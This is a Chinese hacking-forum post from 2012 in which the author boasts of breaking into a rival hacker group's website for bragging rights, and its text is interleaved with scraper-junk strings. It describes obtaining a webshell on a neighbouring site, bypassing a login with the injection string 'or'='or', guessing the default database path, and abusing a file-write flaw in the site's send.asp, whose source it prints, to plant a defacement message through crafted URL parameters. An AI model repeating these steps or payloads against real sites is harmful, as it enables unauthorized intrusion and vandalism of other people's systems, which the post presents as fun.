中国网络渗透测试联盟
标题:
入侵华东黑客联盟装X的过程
[打印本页]
作者:
admin
时间:
2012-11-6 21:06
标题:
入侵华东黑客联盟装X的过程
有些朋友对我和云中鹰搞华东的过程比较感兴趣,其实那个很没技术含量
B2 f6 k5 t, ]4 z9 }' V" {% [
今天闲着无聊,把手上的项目葛一下,来论坛放松一下,顺便说说上次搞华东黑客联盟到装B的过程
. B- a4 o" U' `5 B
这天云中鸡说华东的某人很牛X,利用JPG黑站大法把恶灵战队黑了,还发了个demo出来
+ W! p4 C5 R+ m! g9 [! D
我去看了一下demo,感觉很黑客,于是就和云中鸡搞了一下华东
2 m/ N0 e; b% g* S' ]
首先,我记得华东只被人搞过一次(记性不好,原谅下~~),所以应该防护还是比较好的
3 U3 x; f7 f3 \( c3 g$ y
服务器应该防ARP,不过这还只是猜测
( ^- X# F' E# b# d: | W# y' O5 C
云中鸡说先不搞C段,PZ一下再说
& m. y6 @# \" D( o2 {( F
然后我就打开了
链接标记[url=http://www.3hack.com
www.3hack.com[/url[/url]]
0 |" R4 ]' q6 f+ {. Z: O
一看,我晕,怎么网站变了................以前我比较喜欢到华东去看动画,现在怎么变成这鸟样了,晕..............
9 E, X; L7 \% h; N) L3 X" d+ U; @
这时候云中鸡丢了一个同F的站过来,说进了后台搞不了shell
; g+ }; ]- W/ r! ~+ i4 D
我看了下搞到了一个webshell出来(这里涉及点技巧,不过不是重点,故省略....),登上webshell后发现服务器的权限很BT
1 x& M ]" d5 s# }' U
然后我就把shell丢给云中鸡去提权,过了一会儿找到了一个二级玉米的站shop.xiahack.cn
% o" }; o3 T8 m- V+ i, S4 [
看着是用eshop来架设的网店,虽然不是同F,但还是想搞下他看有什么可利用的地方,用了几个0day去搞发现不是最新版,0day用不鸟
8 k) R. N# `2 R. A- \/ t
问了下云中鸡提权怎样了,他说还在努力,装不鸟B就不睡觉,晕了,这下入侵陷入了僵局...............
& \. [, k" J' e4 M1 |) x& k
无聊到网上乱逛,这时无意中发现一个阿拉伯XXXXXX,具体就不说啥鸟,呵呵~~
+ o0 t4 O p- @, ?' X# r
然后阿拉伯黑客发现了
链接标记[url=http://www.3hack.com
www.3hack.com[/url[/url]]上有个xia的目录很可疑,于是我就去看看是什么
( a e8 T1 c) w) i& K( Y
打开一看,如图1所示。
+ j5 T9 p0 t, S1 ^% A5 a
- L/ Q4 h" u- A
http://00day.cn/forum/attachment/thumb/6_1_a8d665f343765b2.jpg
5 J# F, x$ t; @, s
我靠~~这啥东西?这么帅?点进去一看,如图2所示。
' L7 k6 s& C5 Y# v$ }, {
% w0 R3 V5 @6 Z; |4 U
http://00day.cn/forum/attachment/thumb/6_1_d741c5c7b6b8a48.jpg
) F7 |. l+ _0 w
太帅了,真YD!!
) V" g j. z2 j) l
这个页面应该是一套个人主页程序,而且还挺炫的!
% E$ f7 p. B0 D0 x4 c8 ?
这个页面有发表日志的地方,应该可能存在登陆页面,找了一轮后发现当鼠标放到网页顶端的时候就会弹出登陆页面,如图3所示。
" Q* ]7 ]0 w' e. F
# u T2 _ n$ ]! p: d! F
http://00day.cn/forum/attachment/6_1_b03700cb2fe5d52.jpg
+ _6 I) W j& d1 [/ h
嘿嘿,试着'or'='or'居然进去了!!如图4所示。
- T$ g6 U! e( s2 G, d, x( b5 f
* e9 p7 ~, w$ D
http://00day.cn/forum/attachment/6_1_7107004af344a3c.jpg
; |/ O$ I \& H* f! e, _8 y6 `
经过半个多小时的摸索,还是没有发现可利用的地方。
! E B, ]4 f: }
这下郁闷了,不管了,把这套程序下载下来看看吧
4 K1 ~1 b& c* `. y. e
找了一会才知道这套程序叫做“V时代个人flash主页”
3 K( S) r+ ]) u2 H) v7 I6 M
到官方下了套最新版,然后找了一下可利用的地方,不一会,我发现“/html/admin”这个目录很可能可以利用
1 _' A) ~9 k) m5 X
于是马上打开
链接标记[url=http://www.3hack.com/xia/html/admin
http://www.3hack.com/xia/html/admin[/url[/url]]
# b: q# F9 N+ ^& T: Q9 k% M# k
返回的确实找不到页面,郁闷了,输入
链接标记[url=http://www.3hack.com/xia/html/
http://www.3hack.com/xia/html/[/url[/url]]
3 D3 [! P3 t$ |/ d
同样是找不到页面,真晕!再看看!
, z9 d$ |' k2 H% U
5分钟过后,我发现后台地址是“/asp”,默认数据库是“/asp/vshidai.mdb”,嘿嘿!这下你不死定了!
" b3 }/ t4 l+ X/ q, x5 o+ h" e
马上打开
链接标记[url=http://www.3hack.com/xia/asp/vshidai.mdb
http://www.3hack.com/xia/asp/vshidai.mdb[/url[/url]],我晕!服务器居然设置了mdb后缀映射,下载不了!
7 W- f( i: q3 e2 c( [
打开
链接标记[url=http://www.3hack.com/xia/asp/
http://www.3hack.com/xia/asp/[/url[/url]],发现返回空白,这下我真是服了!
* H" {# E2 \% V5 q/ T+ B
希望快覆灭了,这时我点到了根目录下的send.asp文件,看到里面存在着一个有意思的东西,代码如下:
& B2 x& V2 L# T) @$ n+ h6 _
; x' S& l/ o3 f9 k$ P% p
var a
) j1 r- v3 A1 e2 ^& u; ~7 y
var b
; k' x1 a" [3 m' E- t9 w; I! a; W W
var tx
$ N# R8 N! Q. p9 Q e3 Z9 C# w, n
var clean
6 M8 Q0 j. H. C& m p/ `8 ?
a=Request("re")
* T) q6 L5 d8 t+ `2 }! U
clean=Request("clean")
% [6 g! A5 J Y6 e7 i
var jian="test.txt"
: q& f9 R, p s. G
5 y8 v6 N, W- H, p# y& J
if(clean==1){
; w% M, Z- P5 j/ T+ K' a
tx="&a="
- ?- W) @, i( _; e6 f% ?
var fs2
* ?. t0 f4 e- [; o
var fs2=Server.CreateObject("Scripting.FileSystemObject")
: Z9 f+ t5 ~! o* z5 A0 U6 D
var newdt=fs2.OpenTextFile(Server.MapPath(jian),2,true)
; U% A: }6 W3 Z/ a
newdt.WriteLine("&a=")
/ m/ f0 x8 X; m9 H* b% h
newdt.close()
+ { _$ }7 Q$ J; o9 h
}
% H6 Z2 b6 O, ^# P8 H7 a
/ T) b1 f! o, {( J6 m# }. b. y7 z
if(clean==0|clean==1){
+ [6 ~2 W- v- ^; B$ ^. _. r4 c
tx=""
$ G4 F4 B- V9 R8 Z2 \, ~ `: G
var fso = Server.Createobject("Scripting.FileSystemObject")
6 u3 b& N. {: f; }8 l; q: M
var file = fso.OpenTextFile(Server.Mappath(jian))
# V+ V% m) g& j5 Z6 t8 f& ?7 v
while (!file.AtEndOfStream){
" j; }; r: N& L; |6 _
tx=file.ReadLine()
- f! `& w- {6 d2 c$ v
Response.write (tx)
Q' G- C( k4 o8 x
}
$ Q2 P7 m# L9 g7 Z8 S$ r1 K
Response.write ("&")
. L9 q- o* }1 L
file.close()
# ~8 J, k1 ~9 z0 _" y7 \* i/ u
}
. c8 \+ B7 ~/ a6 f
" I: u( k2 [6 R" `2 U
if(clean==2){
* d9 n$ L% e6 o
tx=""
3 g! B) j& z, u( s* N9 c
var fso = Server.Createobject("Scripting.FileSystemObject")
' A" m! {" v8 r& n$ g! [
var file = fso.OpenTextFile(Server.Mappath(jian))
+ t8 k k% V" m. H, B% J8 k$ C
7 f4 V0 l9 ^* b) K* g# s
var fs2
/ k9 e! T' K% k7 D; g
var fs2=Server.CreateObject("Scripting.FileSystemObject")
) |& o5 o) p& [+ W# x0 v; }3 {& N5 H
var newdt=fs2.OpenTextFile(Server.MapPath(jian),8,true)
6 |9 K. f c! M, s) J& A0 \
/ @1 i( {" }- \/ ~( y+ o$ I
* {/ j' I5 b& ~
while (!file.AtEndOfStream){
7 J" |+ T' S8 c* C$ g, P
tx=file.ReadLine()
* H! w$ p0 k( s; M0 N( z: E
Response.write (tx)}
i4 f% }8 i" J3 E
$ P% t: n* h* r8 V$ I+ B6 ]! H
Response.write (a+"&")
& \3 N$ C- y( s
newdt.WriteLine(a)
5 ?) K/ u0 l; b0 P w
; E6 u; g7 A& @3 ?
file.close()
0 j0 I5 _5 I4 {# V
newdt.close()
n5 Q' K/ Z3 g9 g9 G b
}
c( x2 N5 G( a/ m% ?
4 [- F) [1 e& s5 ~, U2 l2 p5 b' F
$ A, c) _4 [) K! D# B& x
复制代码
+ e# ~% q+ E1 N5 F5 t% K3 g0 P1 H
这下应该可以装B了!从代码看出,我们首先要提交“send.asp?clean=1”来创建一个名为test.txt的文件,文件里面写着“&a=&”
2 V# j6 l S2 p8 a: Z7 E
接下来我们提交“send.asp?clean=2&re=H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”
! `; x, G" Z- p' C- \ w
这样就能在test.txt文件里新建一行并写入“H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”这句话
9 U) z# T S8 N" e6 J9 q( W9 Q% H
过程如图5、6所示。
7 K# w- \* m6 M3 ~3 B) I9 ~) ?- w9 k. s
7 u% \3 ]2 L! h$ d @0 b
http://00day.cn/forum/attachment/thumb/6_1_cd66a1c03f6682b.jpg
- L' c# Y' A5 I* T0 N3 |+ G/ n! v
: S. \$ {) w. `8 I& e
http://00day.cn/forum/attachment/thumb/6_1_942adfb1ce45224.jpg
- W- S' F6 @; k! ~
提交后我们打开
链接标记[url=http://www.3hack.com/xia/test.txt
www.3hack.com/xia/test.txt[/url[/url]]看看,如图7所示。
1 u6 W) f- L8 [
& c% Y! h0 d" L1 R
http://00day.cn/forum/attachment/thumb/6_1_10f60a12650b618.jpg
9 v' v6 V% i+ z' n8 S
这下终于可以装到X了,如果不是V时代的作者写的send.asp代码存在问题,拿到shell是不难的
+ e) O4 z7 d, E) y+ ~
如果jian是经过request取值的话,同样也能搞到shell。
. m+ Q4 N9 G7 `3 K2 U
这次只是装到了X,并没有拿到shell
7 {- t" Z9 ]7 s
已经是凌晨了,跟云中J说了声就睡觉去鸟
* u M0 H6 k, A
估计那B可能搞到了权限,不过我没问他,最近事情比较多,也比较忙
- Y- `* k( Z6 i: s) O
就到这里吧,没技术含量,纯粹装X,高手们见笑了
2 h2 ^8 J' D4 r7 X5 d
另外劝告某些认为上传个JPG就能黑到站的大黑客,你这样自欺欺人吃亏的是你自己
0 ]5 [9 Q% U# h- m6 x
自己学不到技术,却还在自欺欺人
) k% z, \. V6 Y
不说了,本文到这里,最后感谢一下阿拉伯黑客,原来阿拉伯黑客也是很强大的,好了,猪大家愉快~~
! T% E; {$ x e8 [& b2 N3 l) g
2 v5 n* j; i& L( B% ]& r5 A
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2